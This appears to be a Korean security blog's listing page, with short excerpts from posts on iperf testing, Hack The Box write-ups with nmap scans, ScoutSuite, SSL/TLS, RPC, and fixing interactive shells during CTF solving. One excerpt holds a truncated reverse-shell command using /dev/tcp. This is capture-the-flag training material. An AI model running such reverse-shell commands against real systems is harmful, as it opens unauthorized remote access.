[0x00] overview 이번 포스트에서는 네트워크 트래픽 부하 테스트를 위해 사용한 도구를 기록 한다. [0x01] iperf iperf는 네트워크 대역폭을 측정하기 위한 도구로, 서버/클라이언트 간의 데이터 전송 속도를 측정한다. tcp, udp를 지원하여 각각 테스트가 가능하다. 서버 측 설정 root@ubt-1:~#...

여러 번 machine을 재실행하여 write-up 내용에 ip가 서로 상이하지만, 실제론 한 문제의 동일한 환경이다. [0x00] port Scan port 스캔 결과 22, 6789, 8080, 8443이 열려 있다. 이 중 ibm-db2-admin은 IBM DB2 데이터베이스의 관리자 인터페이스에 대한 포트가 열려 있음을 나타내는...

[0x00] Ncc ScoutSuite NCC 그룹에서 제작한 ScoutSuite는 클라우드 환경의 보안 상태를 평가하는 오픈 소스 다중 클라우드 보안 감사 도구로 각 클라우드 업체가 제공한 api를 사용하여 구성 데이터를 수집하고 검토한다. 지원 대상 Amazon Web Services Microsoft Azure Google Cl...

[0x00] SSL/TLS SSL SSL(Secure Sockets Layer)은 네트워크 통신에서 보안을 제공하는 프로토콜로, 데이터를 암호화하여 안전한 전송을 가능하게 한다. TLS TLS(Transport Layer Security)는 SSL의 후속 버전으로, 더 안전하고 강력한 암호화 방법을 제공하여 데이터의 안전성을 강화한다...

htb 문제 풀이 중 shell 연결 시 화살표 입력, 자동 완성 등이 입력되지 않고 ]A 와 같은 형태로 입력되어 다소 불편함이 존재한다. 이를 해결하는 방법을 찾아 공유한다. 보통 문제 풀이 중 아래와 같이 bash shell을 연결하는 경우가 필요하다. os-shell> bash -c 'sh -i >& /dev/tcp/10.1...

nmap scan 결과를 우선 보자. ┌──(root㉿9048af13b510)-[/] └─# nmap 10.129.19.142 -Pn Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 13:37 UTC Nmap scan report for 10.129.19.142 Host is up (0.31s ...

nmap scan 결과를 보면 아래와 같이 ssh와 http가 활성화 되어있음을 알 수 있다. ┌──(root㉿kali)-[/home/user] └─# nmap -sCV 10.129.112.235 -Pn Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 20:39 EST Nmap scan repo...

[0x00] summary Docker Run read-min 🇰  ~  docker run --privileged --sysctl net.ipv6.conf.all.disable_ipv6=0 -it -p 2222:22 -p 8888:8000 kali-htb /bin/sh Connect SSH read-min 😎  ~  ssh roo...

※ HTB Write-up의 경우 풀이 과정 중 machine을 자주 변경하여 풀이 과정 중에 기재한 IP가 모두 다릅니다. 하지만 실제론 동일한 서버이므로 참고 바랍니다. Scan 우선 nmap으로 먼저 스캔해보자. 아래와 같이 탐지 내역이 꽤 많다. rpc, smb, mssql 관련된 port가 활성화 되어있는 것을 알 수 있다. ┌──(...

Remote Procedure Call(RPC)란 원격 프로시저 호출로, 분산 시스템에서 프로그램 간 통신을 위한 프로토콜이나 매커니즘을 나타낸다. client<->server간 통신을 가능하게 하는 기술이다. 보안 고려사항 주요 고려 사항 세부 내용 인증 및 ...